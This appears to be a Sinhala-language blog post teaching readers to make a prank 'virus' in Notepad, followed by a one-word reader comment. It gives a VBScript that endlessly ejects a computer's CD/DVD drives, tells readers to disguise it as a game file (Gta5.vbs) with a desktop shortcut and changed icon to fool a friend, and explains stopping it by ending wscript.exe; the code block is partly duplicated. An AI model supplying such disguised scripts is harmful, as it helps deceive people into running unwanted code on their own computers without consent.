හදමුද වයිරස් එකක්....
හලෝ යාළුවනේ
මම අද ඹයාලට කියාදෙන්ඩ යන්නේ ටිකක් විනෝද වෙන්ඩ පුළුවන් දෙයක් ගැන. ඔයාලට පුළුවන්
ඔයාගෙ යාළුවන්ව ටිකක් බයකරන්ඩ. අපි මේ හදන වයිරස් එකෙන් වෙන්නෙ වයිරස් එක තියෙන
පරිගණකයේ CD හෝ DVD තැටි දාවකය ඉබේම විවෘත
වීම සහ නැවත වැසිමයි. මේ වයිරස් එක ඔබ හිතා මතාම නවත්වන තුරැ ක්රියාත්මකව
පවතිනවා. මම ඔයාලට මේ වයිරස් එක හදන්ඩ කියා දෙන්නේ Notepad
බාවිතා කරල.
හරි අපි
එහෙනම් වැඩේ පටන්ගමු.....
Step : 1
දැන් අපි Notepad විවෘත කරගෙන මේ Code ටික Copy කරගමු.
Set oWMP =
CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Step : 2
දැන් මම
හිතනවා ඔයා Code එක Copy කරගෙන ඉවරයි කියල.
දැන් අපි බලමු මේක කොහොමද Save කරන්නේ කියල.
අපි දැන් යන්නෙ කාව හරි බය කරන්ඩනේ එක හින්දා අපි හිතන්ඩ ඕනෙ අපි බය කරන්ඩ යන කෙනා
Play
කරන Game එක හරි
නිතර open කරන
Folder එකක් ගැන . හරි දැන් මම උදාහරනයකට ගන්නවා
මම මේ වයිරස් එකෙන් බය කරන්ඩ හදන කෙනා වැඩිය Game’s Play කරන කෙනෙක් .
ඒක හින්දා මම
මේ විදියට ඒක save කරනවා.
Gta5.vbs
නැත්තම් ඔයාලට
පුළුවන් මේක ඔයාල කැමති විදියට Save
කරන්ඩ.
(ඔයාල හිතන
නම).vbs
මේ ඔයාල දාන
නමට යටින් අනිවාර්යයෙන් “.vbs” කියන extension එක යොදන්ඩ ඕනෙ...
හරිනෙ දැන් Save
කරල ඉවරනම් Save කරපු File එක Hard
disk එකේ කොහෙට හරි Copy කරන්ඩ.
ඉට පස්සෙ ඒ
File එකෙන් ShortCut
එකක් Desktop එකට හදන්ඩ ඉට
පස්සෙ ඒකේ Icon එක Change
කරන්ඩ.
Step : 3
හරි යාළුවනේ මම දැන් ඔයාලට කියන්ඩ යන්නේ කොහොමද මේ
වයිරස් එක නවත්තන්නේ කියල.
මේ වයිරස් එක නවත්තන්ඩ පොඩි දෙයයි. කරන්ඩ කියෙන්නෙ....
මුලින්ම task manager විවෘත කරගන්ඩ
ඕනෙ
ඊට පස්සෙ Click
කරන්ඩ ඕනෙ process tab
ඊට පස්සෙ
තෝරන්ඩ ඕනෙ wscript.exe
දැන් end process Click කරන්ඩ.
මම හිතනව ඔයාල
හොදින් විනෝද වෙයි කියලා.
Super
ReplyDelete